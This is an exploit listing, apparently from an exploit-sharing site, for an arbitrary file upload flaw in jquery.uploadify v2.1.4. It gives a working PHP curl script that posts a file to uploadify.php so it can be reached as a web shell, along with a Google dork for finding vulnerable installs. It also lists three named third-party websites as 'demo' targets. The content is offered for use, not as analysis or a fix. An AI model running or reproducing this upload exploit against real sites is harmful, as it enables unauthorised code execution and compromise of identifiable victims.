facebook facebook twitter rss

jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 01-12-2012
 -------------------------------------------------------------------------------
jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"jquery.uploadify"
#
#######################################################################################

Exploit : uploadshell.php .asp

<?php
 
$uploadfile
="dz.php";
 
$ch curl_init("http://localhost/scripts/jquery.uploadify-v2.1.4/uploadify.php?folder=/scripts/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
 
?>

Shell Access : http://localhost/scripts/dz.php

<?php
phpinfo
();
?>



#######################################################################################
#
# Demo :
#
# 1) http://www.old.kniink.com/kniink_media/js/jquery.uploadify-v2.1.4/uploadify.php

# 2) http://boredatuni.com/scripts/jquery.uploadify-v2.1.4/uploadify.php
#
# 3) http://www.collectrium.com/_resources/js/jquery.uploadify-v2.1.4/uploadify.php
#
#######################################################################################

Like us on Facebook :